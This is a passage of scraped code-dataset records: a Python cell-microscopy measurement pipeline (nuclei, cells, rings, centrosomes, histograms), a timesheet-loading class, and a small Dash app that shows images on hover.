r_seg.is_empty:\n continue\n if type(r_seg) == MultiLineString:\n r_seg = r_seg[0]\n pt = Point(r_seg.coords[-1])\n\n for pt0, pt1 in m.pairwise(nucleus.exterior.coords):\n # if pt.touches(LineString([pt0, pt1])):\n if Point(pt).distance(LineString([pt0, pt1])) < 1e-6:\n # compute normal vector\n dx = pt1[0] - pt0[0]\n dy = pt1[1] - pt0[1]\n # touching point of the polygon line segment\n px, py = pt.x, pt.y\n # normalize normal vector\n mag = np.sqrt(dx ** 2 + dy ** 2)\n dx, dy = dx / mag, dy / mag\n # get length from ring thickness\n length = 3\n\n # axc.plot(px, py, dx, c='green', marker='o', markersize=2)\n axc.plot([px, px - dy * length], [py, py + dx * length], c='magenta', lw=1)\n\n # draw line from nucleus centroid to point\n pt_x, pt_y = r_seg.xy\n axc.plot(list(pt_x), list(pt_y), c='gray', lw=0.5)\n\n # draw normals of nucleus polygon\n dx_v, dy_v = np.diff(nucleus.exterior.xy)\n for dx, dy, (px, py) in zip(dx_v, dy_v, nucleus.exterior.coords):\n x = px + dx / 2\n y = py + dy / 2\n # normalize normal vector\n mag = np.sqrt(dx ** 2 + dy ** 2)\n dx, dy = dx / mag, dy / mag\n length = 1.5\n\n # axc.plot(x, y, c='yellow', marker='o', markersize=1)\n axc.arrow(x, y, -dy * length, dx * length, color='blue', head_width=0.5, ls='-', lw=0.1)\n\n _m = 30\n x0, xf = nucleus.centroid.x - _m, nucleus.centroid.x + _m\n y0, yf = nucleus.centroid.y - _m, nucleus.centroid.y + _m\n if x0 < 0: xf -= x0\n if y0 < 0: yf -= y0\n axc.imshow(bkg_img, extent=[0, w_um, h_um, 0])\n axc.set_xlim(x0, xf)\n axc.set_ylim(y0, yf)\n axc.plot([x0 + 5, x0 + 15], [y0 + 5, y0 + 5], c='w', lw=4)\n axc.text(x0 + 5, y0 + 7, '10 um', color='w', zorder=50)\n if \"cluster\" in smp:\n axc.text(nucleus.centroid.x, nucleus.centroid.y, smp[\"cluster\"].iloc[0], color='w', zorder=10)\n\n def _exec_op(self, img, op, cfg_row):\n img = img[cfg_row['number'].iloc[0]]\n assert len(img) > 0, 'no image for measurements'\n if cfg_row['flatfield'].iloc[0]:\n img = self._flat_field_correct(img, cfg_row['number'].iloc[0])\n if not self._mdf.empty:\n self._ix = ((self._mdf['row'] == self._row) &\n (self._mdf['col'] == self._col) &\n (self._mdf['fid'] == self._fid) &\n 
(self._mdf['p'] == self._zp))\n else:\n self._ix = self._mdf.index\n op(img, cfg=cfg_row)\n\n def _stack_operation(self, row, col, fid, configuration_row, op):\n assert len(configuration_row) == 1, \"only one configuration row allowed\"\n z_op = configuration_row['z_stack_aggregation'].iloc[0]\n self._row = row\n self._col = col\n self._fid = fid\n\n # get stack processing from configuration file and apply it to an image\n if z_op == 'use each image individually':\n logger.info(\"Processing each image in the stack individually.\")\n gr = self.files[(self.files['row'] == row) & (self.files['col'] == col) & (self.files['fid'] == fid)]\n for zp, z in gr.groupby('p'): # iterate over z positions\n logger.debug(\"Z stack %s\" % zp)\n self._zp = zp\n img = self.image(row, col, fid, zp)\n self._exec_op(img, op, configuration_row)\n elif z_op == 'do a max projection':\n logger.info(\"Performing a max projection on the stack previous processing.\")\n self._zp = \"max\"\n img = self.max_projection(row, col, fid)\n self._exec_op(img, op, configuration_row)\n else:\n logger.warning(\"Z_stack aggregation is bad configured. Nothing done for this operation.\")\n pass\n\n def measure(self, *args):\n if len(args) == 1 and isinstance(args[0], int):\n _id = args[0]\n r = self.files_gr.ix[_id - 1]\n row, col, fid = r['row'], r['col'], r['fid']\n logger.debug('measuring id=%d row=%d col=%d fid=%d' % (_id, row, col, fid))\n\n elif len(args) == 3 and np.all([np.issubdtype(a, np.integer) for a in args]):\n row, col, fid = args[0], args[1], args[2]\n else:\n logger.warning('nothing to save on this image')\n return pd.DataFrame()\n\n df = self._measure_row_col_fid(row, col, fid)\n name = 'r%d-c%d-f%d.csv' % (row, col, fid)\n df.to_csv(self.save_path(name, subdir='pandas'), index=False)\n if self._samples is None: self._samples = df\n return df\n\n def _measure_row_col_fid(self, row, col, fid):\n cfg_ch = self.configuration['channels']\n cfg = pd.DataFrame(cfg_ch)\n self._mdf = pd.DataFrame()\n # NOTE: all the extraction process and validation is done on the pixel space, and the final dataframe is in [um]\n\n # --------------------\n # Find nuclei\n # --------------------\n s = cfg[cfg['z_stack_aggregation'].apply(lambda l: l == 'use each image individually')]\n zstack_idv = len(s) > 0\n c = cfg[cfg['pipeline'].apply(lambda l: 'nucleus' in l)]\n assert len(c) > 0, 'nuclei finding step needed in configuration'\n assert len(c) < 2, 'only one nuclei finding step per batch allowed'\n if zstack_idv:\n c.loc[:, 'z_stack_aggregation'] = 'use each image individually'\n self._stack_operation(row, col, fid, c, self._measure_nuclei)\n\n # --------------------\n # Find cells\n # --------------------\n self.cells_measured = False\n c = cfg[cfg['pipeline'].apply(lambda l: 'cell' in l)]\n assert len(c) < 2, 'only one cell finding step per batch allowed'\n if len(c) == 1:\n self._stack_operation(row, col, fid, c, self._measure_cells)\n\n # --------------------\n # Intensity in nucleus\n # --------------------\n c = cfg[cfg['pipeline'].apply(lambda l: 'intensity_in_nucleus' in l)]\n for _, cf in c.iterrows():\n self._stack_operation(row, col, fid, c, self._measure_intensity_in_nucleus)\n\n # --------------------\n # Ring around nucleus\n # --------------------\n c = cfg[cfg['pipeline'].apply(lambda l: 'ring_around_nucleus' in l)]\n assert len(c) < 2, 'only one ring measurement step per batch allowed at the moment'\n for _, cf in c.iterrows():\n self._stack_operation(row, col, fid, c, self._measure_ring_intensity_around_nucleus)\n\n # 
--------------------\n # Particle in cytoplasm\n # --------------------\n c = cfg[cfg['pipeline'].apply(lambda l: 'particle_in_cytoplasm' in l)]\n # assert len(c) == 0, 'cell finding step needed in configuration'\n assert len(c) < 2, 'only one particle_in_cytoplasm step per batch allowed'\n if len(c) == 1:\n assert self.cells_measured, 'particle_in_cytoplasm needs cell data'\n self._stack_operation(row, col, fid, c, self._measure_particle_in_cytoplasm)\n\n # --------------------\n # Histogram\n # --------------------\n c = cfg[cfg['pipeline'].apply(lambda l: 'histogram' in l)]\n for _, cf in c.iterrows():\n self._stack_operation(row, col, fid, c, self._measure_histogram)\n\n c = cfg[cfg['pipeline'].apply(lambda l: 'histogram_of_nucleus' in l)]\n for _, cf in c.iterrows():\n self._stack_operation(row, col, fid, c, self._measure_histogram_on_nucleus)\n\n c = cfg[cfg['pipeline'].apply(lambda l: 'histogram_of_ring' in l)]\n for _, cf in c.iterrows():\n self._stack_operation(row, col, fid, c, self._measure_histogram_on_ring)\n\n # --------------------\n # Line intensity\n # --------------------\n c = cfg[cfg['pipeline'].apply(lambda l: 'line_intensity_ring' in l)]\n for _, cf in c.iterrows():\n self._stack_operation(row, col, fid, c, self._measure_line_intensity)\n\n # --------------------\n # Re label id column if analizing every image in the z-stack\n # --------------------\n if zstack_idv:\n self._relabel_id()\n\n return self._mdf\n\n def _measure_nuclei(self, nuclei_img, cfg, r=10):\n imgseg, nuclei = m.nuclei_segmentation(nuclei_img, radius=r * self.pix_per_um)\n nuclei = m.exclude_contained(nuclei)\n\n if len(nuclei) == 0:\n logger.warning(\"Couldn't find nuclei in image.\")\n return\n\n for nucleus in nuclei:\n nucl_bnd = (nucleus['boundary']\n .buffer(self.pix_per_um, join_style=1)\n .buffer(-self.pix_per_um, join_style=1)\n .simplify(self.pix_per_um / 2, preserve_topology=True)\n )\n if nucl_bnd.is_empty: continue\n logger.debug(\"previous simplify %d, after %d\" %\n (len(nucleus['boundary'].exterior.coords), len(nucl_bnd.exterior.coords)))\n if nucl_bnd.area < np.pi * (3 * self.pix_per_um) ** 2: continue\n dna_int = m.integral_over_surface(nuclei_img, nucl_bnd)\n\n # convert everything to um space for dataframe construction\n n_bum = affinity.scale(nucl_bnd, xfact=self.um_per_pix, yfact=self.um_per_pix, origin=(0, 0, 0))\n\n # TODO: Add units support\n d = pd.DataFrame(data={\n 'id': [nucleus['id']],\n 'row': [self._row],\n 'col': [self._col],\n 'fid': [self._fid],\n 'p': [self._zp],\n '%s_int' % cfg['tag'].iloc[0]: [int(dna_int)],\n '%s_dens' % cfg['tag'].iloc[0]: [int(dna_int / nucl_bnd.area)],\n 'nucleus': dumps(n_bum, rounding_precision=4),\n 'nuc_pix': dumps(nucl_bnd, rounding_precision=1),\n })\n self._mdf = self._mdf.append(d, ignore_index=True, sort=False)\n logger.debug(\"%d nuclei found in image\" % len(nuclei))\n\n return self._mdf.index\n\n def _measure_cells(self, cell_img, cfg):\n assert self._ix.any(), \"no rows in the filtered dataframe\"\n # generate an image based on nuclei found previously\n nuclei_img = np.zeros(cell_img.shape, dtype=np.bool)\n nuclei = list()\n for _id, nuc in self._mdf.set_index(\"id\").loc[self._ix, \"nuc_pix\"].iteritems():\n _nimg = m.generate_mask_from(nuc, cell_img.shape)\n nuclei_img = nuclei_img | _nimg\n nuclei.append({\"id\": _id, \"boundary\": shapely.wkt.loads(nuc)})\n cells, cells_mask = m.cell_boundary(cell_img, nuclei_img)\n\n # filter polygons contained in others\n cells = m.exclude_contained(cells)\n logger.debug(\"%d cells found 
in image\" % len(cells))\n\n width, height = cell_img.shape\n frame = Polygon([(0, 0), (0, height), (width, height), (width, 0)])\n touching_fr = too_big = no_nuclei = two_nuclei = 0\n # iterate through all cells\n for cl in cells:\n logger.debug(\"processing cell id %d\" % cl['id'])\n cell_bnd = (cl['boundary']\n .buffer(self.pix_per_um, join_style=1)\n .buffer(-self.pix_per_um, join_style=1)\n .simplify(self.pix_per_um / 2, preserve_topology=True)\n )\n logger.debug(\"previous simplify %d, after %d\" %\n (len(cl['boundary'].exterior.coords), len(cell_bnd.exterior.coords)))\n\n for _id, nucleus in self._mdf.loc[self._ix, \"nuc_pix\"]:\n valid_sample, reason = m.is_valid_sample(frame, cell_bnd, nucleus, nuclei)\n if reason == m.REJECTION_TOUCHING_FRAME: touching_fr += 1\n if reason == m.REJECTION_NO_NUCLEUS: no_nuclei += 1\n if reason == m.REJECTION_TWO_NUCLEI: two_nuclei += 1\n if reason == m.REJECTION_CELL_TOO_BIG: too_big += 1\n if valid_sample:\n tubulin_int = m.integral_over_surface(cell_img, cell_bnd)\n tub_density = tubulin_int / cell_bnd.area\n if tub_density < 150:\n logger.warning(\n \"Sample rejected after validation because it had a low tubulin density.\")\n logger.debug('tubulin density in cell: %0.2f, intensity %0.2f, area %0.2f' % (\n tub_density, tubulin_int, cell_bnd.area))\n continue\n\n # convert everything to um space for dataframe construction\n c_bum = affinity.scale(cell_bnd, xfact=self.um_per_pix, yfact=self.um_per_pix, origin=(0, 0, 0))\n\n # TODO: Add units support\n ix = self._ix & (self._mdf['id'] == nucleus['id'])\n self._mdf.loc[ix, 'tubulin_int'] = int(tubulin_int)\n self._mdf.loc[ix, 'tubulin_dens'] = int(tubulin_int / cell_bnd.area)\n self._mdf.loc[ix, 'cell'] = dumps(c_bum, rounding_precision=4)\n self._mdf.loc[ix, 'cell_pix'] = dumps(cell_bnd, rounding_precision=1)\n\n logger.info(\"%d samples rejected because they were touching the frame\" % touching_fr)\n logger.info(\"%d samples rejected because cell didn't have a nucleus\" % no_nuclei)\n logger.info(\"%d samples rejected because cell had more than two nuclei\" % two_nuclei)\n logger.info(\"%d samples rejected because cell area was too big\" % too_big)\n if (~self._mdf.loc[self._ix, \"cell\"].isna()).any():\n self.cells_measured = True\n\n def _measure_intensity_in_nucleus(self, image, cfg):\n assert self._ix.any(), \"no rows in the filtered dataframe\"\n\n nuclei = list()\n for _id, nuc in self._mdf.loc[self._ix, \"nuc_pix\"].set_index(\"id\").iteritems():\n nuclei.append({\"id\": _id, \"boundary\": shapely.wkt.loads(nuc)})\n\n for ix, row in self._mdf[self._ix].iterrows():\n _id = row[\"id\"]\n nucl_bnd = shapely.wkt.loads(row[\"nuc_pix\"])\n\n logger.debug(\"intensity_in_nucleus for nucleus id %d\" % _id)\n signal_int = m.integral_over_surface(image, nucl_bnd)\n signal_density = signal_int / nucl_bnd.area\n\n # TODO: scale intensity from pixels^2 to um^2\n self._mdf.loc[ix, '%s_int' % cfg['tag'].iloc[0]] = int(signal_int)\n self._mdf.loc[ix, '%s_dens' % cfg['tag'].iloc[0]] = int(signal_density)\n\n def _measure_ring_intensity_around_nucleus(self, image, cfg):\n assert self._ix.any(), \"no rows in the filtered dataframe\"\n for ix, row in self._mdf[self._ix].iterrows():\n nucl_bnd = shapely.wkt.loads(row[\"nuc_pix\"])\n thickness = float(cfg['rng_thickness'])\n thickness *= self.pix_per_um\n rng_bnd = (nucl_bnd\n .buffer(thickness)\n .difference(nucl_bnd)\n .simplify(self.pix_per_um / 2, preserve_topology=True)\n )\n if rng_bnd.area > 0:\n rng_int = m.integral_over_surface(image, rng_bnd)\n if 
np.isnan(rng_int): continue\n rng_density = rng_int / rng_bnd.area\n else:\n logger.warning(\"Ring polygon with no area!\\r\\nThickness of ring set to %.2f [pix]\" % thickness)\n continue\n\n logger.debug(\"ring_around_nucleus on tag '%s' for nucleus id %d = %s\" % (\n cfg['tag'].iloc[0], row['id'], m.eng_string(rng_int, si=True, format='%.2f')))\n rng_um = affinity.scale(rng_bnd, xfact=self.um_per_pix, yfact=self.um_per_pix, origin=(0, 0, 0))\n\n # TODO: scale intensity from pixels^2 to um^2\n self._mdf.loc[ix, 'ring'] = dumps(rng_um, rounding_precision=4)\n self._mdf.loc[ix, 'ring_pix'] = dumps(rng_bnd, rounding_precision=1)\n self._mdf.loc[ix, '%s_rng_int' % cfg['tag'].iloc[0]] = int(rng_int)\n self._mdf.loc[ix, '%s_rng_dens' % cfg['tag'].iloc[0]] = int(rng_density)\n # logger.debug(\"\\r\\n\" + str(self._mdf[ix]))\n\n def _measure_particle_in_cytoplasm(self, image, cfg):\n assert self._ix.any(), \"no rows in the filtered dataframe\"\n width, height = image.shape\n frame = Polygon([(0, 0), (0, height), (width, height), (width, 0)])\n\n nuclei = list()\n for _id, nuc in self._mdf.set_index(\"id\").loc[self._ix, \"nuc_pix\"].iteritems():\n nuclei.append({\"id\": _id, \"boundary\": shapely.wkt.loads(nuc)})\n\n for ix, row in self._mdf[self._ix].iterrows():\n _id = row[\"id\"]\n nucl_bnd = shapely.wkt.loads(row[\"nuc_pix\"])\n cell_bnd = shapely.wkt.loads(row[\"cell_pix\"])\n x0, y0, xf, yf = [int(u) for u in nucl_bnd.bounds]\n\n valid_sample, reason = m.is_valid_sample(frame, cell_bnd, nucl_bnd, nuclei)\n if not valid_sample: continue\n logger.debug(\"particle_in_cytoplasm for cell id %d\" % _id)\n\n centr_crop = image[y0:yf, x0:xf]\n logger.info('applying centrosome algorithm for nuclei %d' % _id)\n\n # load boundaries of um space for dataframe construction\n n_bum = shapely.wkt.loads(row[\"nucleus\"])\n c_bum = shapely.wkt.loads(row[\"cell\"])\n\n cntr = m.centrosomes(centr_crop, min_size=0.2 * self.pix_per_um,\n max_size=0.5 * self.pix_per_um,\n threshold=0.01)\n cntr[:, 0] += x0\n cntr[:, 1] += y0\n cntrsmes = list()\n for k, c in enumerate(cntr):\n pt = Point(c[0], c[1])\n pti = m.integral_over_surface(image, pt.buffer(1 * self.pix_per_um))\n cntrsmes.append(\n {'id': k, 'pt': Point(c[0] / self.pix_per_um, c[1] / self.pix_per_um), 'i': pti})\n cntrsmes = sorted(cntrsmes, key=lambda ki: ki['i'], reverse=True)\n\n logger.debug('found {:d} centrosomes'.format(len(cntrsmes)))\n\n twocntr = len(cntrsmes) >= 2\n c1 = cntrsmes[0] if len(cntrsmes) > 0 else None\n c2 = cntrsmes[1] if twocntr else None\n\n lc = 2 if c2 is not None else 1 if c1 is not None else np.nan\n # TODO: Add units support\n self._mdf.loc[ix, 'centrosomes'] = lc\n self._mdf.loc[ix, 'c1'] = c1['pt'].wkt if c1 is not None else None\n self._mdf.loc[ix, 'c2'] = c2['pt'].wkt if c2 is not None else None\n self._mdf.loc[ix, 'c1_int'] = c1['i'] if c1 is not None else np.nan\n self._mdf.loc[ix, 'c2_int'] = c2['i'] if c2 is not None else np.nan\n self._mdf.loc[ix, 'c1_d_nuc_centr'] = n_bum.centroid.distance(\n c1['pt']) if c1 is not None else np.nan\n self._mdf.loc[ix, 'c2_d_nuc_centr'] = n_bum.centroid.distance(c2['pt']) if twocntr else np.nan\n self._mdf.loc[ix, 'c1_d_nuc_bound'] = n_bum.exterior.distance(\n c1['pt']) if c1 is not None else np.nan\n self._mdf.loc[ix, 'c2_d_nuc_bound'] = n_bum.exterior.distance(c2['pt']) if twocntr else np.nan\n self._mdf.loc[ix, 'c1_d_cell_centr'] = c_bum.centroid.distance(\n c1['pt']) if c1 is not None else np.nan\n self._mdf.loc[ix, 'c2_d_cell_centr'] = c_bum.centroid.distance(c2['pt']) if 
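A self-contained sketch of the annulus construction used by _measure_ring_intensity_around_nucleus above: buffer the nucleus polygon outward by the ring thickness and subtract the original, leaving a ring to integrate over. The numbers are illustrative; the real code buffers the nucleus deserialized from WKT by rng_thickness in pixels.

from shapely.geometry import Point

nucleus = Point(50, 50).buffer(10)   # stand-in for the nucleus polygon
thickness = 4                        # ring thickness in pixels
ring = nucleus.buffer(thickness).difference(nucleus)
assert ring.area > 0
print(ring.area)                     # ~ pi * ((10 + 4)**2 - 10**2)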
twocntr else np.nan\n self._mdf.loc[ix, 'c1_d_cell_bound'] = c_bum.exterior.distance(\n c1['pt']) if c1 is not None else np.nan\n self._mdf.loc[ix, 'c2_d_cell_bound'] = c_bum.exterior.distance(c2['pt']) if twocntr else np.nan\n self._mdf.loc[ix, 'nuc_centr_d_cell_centr'] = n_bum.centroid.distance(c_bum.centroid)\n self._mdf.loc[ix, 'c1_d_c2'] = c1['pt'].distance(c2['pt']) if twocntr else np.nan\n\n # if len(self._mdf) > 0:\n # # Compute SNR: Step 1. Calculate standard deviation of background\n # logger.debug('computing std dev of background for SNR calculation')\n # std_pericentrin = np.std(_img[cells_mask])\n # # u_pericentrin = np.mean(_img[cells_mask])\n # self._mdf['snr_c1'] = self._mdf['c1_int'].apply(lambda i: i / std_pericentrin if not np.isnan(i) else np.nan)\n # self._mdf['snr_c2'] = self._mdf['c2_int'].apply(lambda i: i / std_pericentrin if not np.isnan(i) else np.nan)\n\n def _measure_histogram(self, image, cfg):\n n_bins = cfg['hist_bins'].iloc[0]\n min = cfg['hist_min'].iloc[0]\n max = cfg['hist_max'].iloc[0]\n tag = cfg['tag'].iloc[0]\n log_bins = cfg['hist_log'].iloc[0]\n if log_bins:\n bins = np.logspace(np.log10(1 if min == 0 else min), np.log10(max), n_bins)\n else:\n bins = np.linspace(min, max, n_bins)\n histogram, edges = np.histogram(image.ravel(), bins)\n\n if self._ix.any():\n self._mdf.loc[self._ix, 'hist_edges'] = np.array2string(edges, **_hist_edges_arr_ops)\n self._mdf.loc[self._ix, '%s_hist' % tag] = np.array2string(histogram.astype(int), separator=',')\n else:\n d = pd.DataFrame(data={\n 'id': [None],\n 'row': [self._row],\n 'col': [self._col],\n 'fid': [self._fid],\n 'p': [self._zp],\n 'hist_edges': [np.array2string(edges, **_hist_edges_arr_ops)],\n '%s_hist' % tag: [np.array2string(histogram.astype(int), separator=',')],\n })\n self._mdf = self._mdf.append(d, ignore_index=True, sort=False)\n\n def _measure_histogram_on_nucleus(self, image, cfg):\n assert self._ix.any(), \"no rows in the filtered dataframe\"\n assert \"nuc_pix\" in self._mdf[self._ix], \"nucleus detection step needed\"\n\n n_bins = cfg['hist_bins'].iloc[0]\n min = cfg['hist_min'].iloc[0]\n max = cfg['hist_max'].iloc[0]\n tag = cfg['tag'].iloc[0]\n log_bins = cfg['hist_log'].iloc[0]\n if log_bins:\n bins = np.logspace(np.log10(1 if min == 0 else min), np.log10(max), n_bins)\n else:\n bins = np.linspace(min, max, n_bins)\n\n for ix, row in self._mdf[self._ix].iterrows():\n _id = row[\"id\"]\n nucl_bnd = shapely.wkt.loads(row[\"nuc_pix\"])\n logger.debug(\"histogram_on_nucleus for nucleus id %d\" % _id)\n\n histogram, edges = m.histogram_of_surface(image, nucl_bnd, bins)\n\n self._mdf.loc[self._ix, 'hist_edges'] = np.array2string(edges, **_hist_edges_arr_ops)\n self._mdf.loc[self._ix, '%s_nuc_hist' % tag] = np.array2string(histogram.astype(int), separator=',')\n\n def _measure_histogram_on_ring(self, image, cfg):\n assert self._ix.any(), \"no rows in the filtered dataframe\"\n assert \"ring_pix\" in self._mdf[self._ix], \"ring detection step needed\"\n\n n_bins = cfg['hist_bins'].iloc[0]\n min = cfg['hist_min'].iloc[0]\n max = cfg['hist_max'].iloc[0]\n tag = cfg['tag'].iloc[0]\n log_bins = cfg['hist_log'].iloc[0]\n if log_bins:\n bins = np.logspace(np.log10(1 if min == 0 else min), np.log10(max), n_bins)\n else:\n bins = np.linspace(min, max, n_bins)\n\n for ix, row in self._mdf[self._ix].iterrows():\n _id = row[\"id\"]\n rng_bnd = shapely.wkt.loads(row[\"ring_pix\"])\n logger.debug(\"histogram_on_nucleus for nucleus id %d\" % _id)\n\n histogram, edges = m.histogram_of_surface(image, rng_bnd, 
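The _measure_histogram* methods above all share the same binning block; the sketch below isolates it, renaming min/max to hist_min/hist_max because the originals shadow the Python built-ins, and keeping the guard that avoids log10(0) when the configured minimum is zero:

import numpy as np

image = np.random.default_rng(0).integers(0, 4096, size=(64, 64))
n_bins, hist_min, hist_max, log_bins = 32, 0, 4096, True

if log_bins:
    # clamp the lower edge to 1 so log10 is defined
    bins = np.logspace(np.log10(1 if hist_min == 0 else hist_min),
                       np.log10(hist_max), n_bins)
else:
    bins = np.linspace(hist_min, hist_max, n_bins)
histogram, edges = np.histogram(image.ravel(), bins)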
bins)\n\n self._mdf.loc[self._ix, 'hist_edges'] = np.array2string(edges, **_hist_edges_arr_ops)\n self._mdf.loc[self._ix, '%s_rng_hist' % tag] = np.array2string(histogram.astype(int), separator=',')\n\n def _measure_line_intensity(self, image, cfg):\n assert self._ix.any(), \"no rows in the filtered dataframe\"\n assert \"ring_pix\" in self._mdf[self._ix], \"ring detection step needed\"\n\n width, height = [s for s in image.shape]\n tag = cfg['tag'].iloc[0]\n n_lines = cfg['n_lines'].iloc[0]\n rng_thick = cfg['rng_thickness'].iloc[0]\n rng_thick *= self.pix_per_um\n angle_delta = 2 * np.pi / n_lines\n frame = Polygon([(0, 0), (0, width), (height, width), (height, 0)]).buffer(-rng_thick * self.pix_per_um)\n\n for ix, row in self._mdf[self._ix].iterrows():\n _id = row[\"id\"]\n nucleus = shapely.wkt.loads(row[\"nuc_pix\"])\n logger.debug(\"line_intensity for nucleus id %d\" % _id)\n\n minx, miny, maxx, maxy = nucleus.bounds\n radius = max(maxx - minx, maxy - miny)\n for k, angle in enumerate([angle_delta * i for i in range(n_lines)]):\n ray = LineString([nucleus.centroid,\n (nucleus.centroid.x + radius * np.cos(angle),\n nucleus.centroid.y + radius * np.sin(angle))])\n r_seg = ray.intersection(nucleus)\n # print(r_seg, ray)\n if r_seg.is_empty:\n continue\n if type(r_seg) == MultiLineString:\n r_seg = r_seg[0]\n # print(r_seg)\n pt = Point(r_seg.coords[-1])\n if not frame.contains(pt):\n continue\n\n for pt0, pt1 in m.pairwise(nucleus.exterior.coords):\n # if pt.touches(LineString([pt0, pt1])):\n if Point(pt).distance(LineString([pt0, pt1])) < 1e-6:\n # compute normal vector\n dx = pt1[0] - pt0[0]\n dy = pt1[1] - pt0[1]\n # touching point of the polygon line segment\n px, py = pt.x, pt.y\n # normalize normal vector\n mag = np.sqrt(dx ** 2 + dy ** 2)\n dx, dy = dx / mag, dy / mag\n\n r0, c0, r1, c1 = np.array([px, py, px - dy * rng_thick, py + dx * rng_thick]).astype(int)\n lin = LineString([(r0, c0), (r1, c1)])\n rr, cc = draw.line(r0, c0, r1, c1)\n\n # TODO: Add units support\n ix = self._ix & (self._mdf['id'] == _id)\n self._mdf.loc[ix, '%s_line_%02d' % (tag, k)] = np.array2string(image[cc, rr], separator=',')\n # self._mdf.loc[ix, '%s_line_%02d_sum' % (tag, k)] = m.integral_over_line(image, lin).astype(int)\n self._mdf.loc[ix, '%s_int_lines' % tag] = int(n_lines)\n\n # FIXME: not measuring nucleus\n # lin = r_seg\n r0, c0, r1, c1 = np.array(r_seg).flatten().astype(int)\n rr, cc = draw.line(r0, c0, r1, c1)\n self._mdf.loc[ix, '%s_nuc_line_%02d' % (tag, k)] = np.array2string(image[cc, rr], separator=',')\n # self._mdf.loc[ix, '%s_nuc_line_%02d_sum' % (tag, k)] = m.integral_over_line(image, lin).astype(int)\n\n def _relabel_id(self):\n assert self._ix.any(), \"no rows in the filtered dataframe\"\n\n def _fn(df):\n z = df[\"p\"].unique()\n for k, (_ix, nuc) in enumerate(df.loc[df[\"p\"] == min(z), \"nuc_pix\"].iteritems()): # for every nuclei\n nucleus = shapely.wkt.loads(nuc).buffer(2 * self.pix_per_um)\n in_nuc_ix = df[\"nuc_pix\"].apply(lambda v: nucleus.contains(shapely.wkt.loads(v)))\n df.loc[in_nuc_ix, \"zid\"] = k\n\n return df\n\n group = [\"row\", \"col\", \"fid\"]\n self._mdf = self._mdf.groupby(group).apply(_fn).reset_index(drop=True)\n","repo_name":"fabio-echegaray/operetta","sub_path":"operetta/cfg_channels.py","file_name":"cfg_channels.py","file_ext":"py","file_size_in_byte":43967,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"32804694384","text":"import logging\nimport datetime\nfrom collections import 
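A worked sketch of the normal-vector step inside _measure_line_intensity above: for a boundary segment with direction (dx, dy), the sampling line leaves the nucleus edge along the perpendicular (-dy, dx) after normalising, which is exactly the (px - dy*t, py + dx*t) offset in the original.

import numpy as np

pt0, pt1 = (0.0, 0.0), (3.0, 4.0)        # one boundary segment
dx, dy = pt1[0] - pt0[0], pt1[1] - pt0[1]
mag = np.hypot(dx, dy)
dx, dy = dx / mag, dy / mag              # unit direction (0.6, 0.8)
normal = (-dy, dx)
print(normal)                            # (-0.8, 0.6), perpendicular to the segment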
OrderedDict\nfrom timesheet.calendar import Calendar\nfrom timesheet.timesheet import Timesheet\n\n#-----------------------------------------------------------------------\nclass TsData:\n #region = None\n #team = None\n #weeks = None\n\n def __init__(self,region,team,weeks,flData):\n self.region = region\n self.team = team\n self.weeks = weeks\n\n tsDict = self.GetFileList(flData,weeks,region)\n self.tsdict = self.ReadTimesheets(tsDict)\n\n #---------------------------------------------------------------------\n def GetFileList(self,flData,weeks,region):\n tsDict = OrderedDict()\n now = datetime.date.today().strftime(\"%Y-%m-%d\")\n week = Calendar.GetWeek(now)\n for idx in range(1,week):\n tsDict[Calendar.week[idx]] = None\n\n for i in weeks:\n wsDate = Calendar.week[i]\n if (wsDate in flData.weeks):\n if (flData.weeks[wsDate] != None):\n tsDict[wsDate] = OrderedDict()\n for item in flData.weeks[wsDate]:\n tsDict[wsDate][item] = flData.weeks[wsDate][item]\n else:\n logging.debug('Skipping ' + region + ' Filelist for week ' + str(i).rjust(2) + ' - ' + str(wsDate))\n\n# logging.debug('Building ' + region + ' Filelist for week ' + str(i+1).rjust(2) + ' ' + str(wsDate))\n# dict = flData.weeks[wsDate]\n# for key,value in dict.items():\n# list.append(value)\n# tslist.append(sorted(list))\n# else:\n# logging.debug('Skipping ' + region + ' Filelist for week ' + str(i+1).rjust(2) + ' ' + str(wsDate))\n\n return tsDict\n\n #---------------------------------------------------------------------\n def ReadTimesheets(self,tsDict):\n for wsDate in tsDict:\n faeDict = tsDict[wsDate]\n if (faeDict):\n for name in faeDict:\n ts = Timesheet(faeDict[name],wsDate)\n ts.ReadFile()\n tsDict[wsDate][name].timeSheet = ts\n\n return tsDict\n","repo_name":"lhoag64/Queries","sub_path":"Queries/Queries/timesheet/tsdata.py","file_name":"tsdata.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71784279912","text":"import dash\nimport pandas as pd\nimport numpy as np\nimport plotly.graph_objs as go\nimport json\nfrom dash import dcc \nfrom dash import html\nfrom dash.dependencies import Input, Output, State\nimport base64\n\napp = dash.Dash()\n\n#this will show an image depending on what data point is being hovered over\n\ndf = pd.read_csv('./data/wheels.csv')\n\ndef encode_image(image_file):\n encoded = base64.b64encode(open(image_file,'rb').read())\n return f'data:image/png;base64,{encoded.decode()}'\n\napp.layout = html.Div([\n html.Div(dcc.Graph(id='wheels-plot',\n figure={'data':[go.Scatter(\n x=df['color'],\n y=df['wheels'],\n dy=1,\n mode='markers',\n marker={'size':15}\n )],\n 'layout':go.Layout(title='Test', hovermode='closest')\n }),style={'width':'30%', 'float':'left'}),\n html.Div([html.Img(id='hover-data',src='children',height=300)],\n style={'paddingTop':35})\n])\n#IMPORTANT hover-data IS AN ID WE SET hoverData IS A DCC.GRAPH FUNCTION\n@app.callback(Output('hover-data', 'src'),\n [Input('wheels-plot','hoverData')] \n)\ndef callback_image(hoverData):\n wheel = hoverData['points'][0]['y']\n color = hoverData['points'][0]['x']\n path = './data/images/'\n return encode_image(path+df[(df['wheels']==wheel)& \n (df['color']==color)]\n ['image'].values[0])\n\nif __name__ == '__main__':\n 
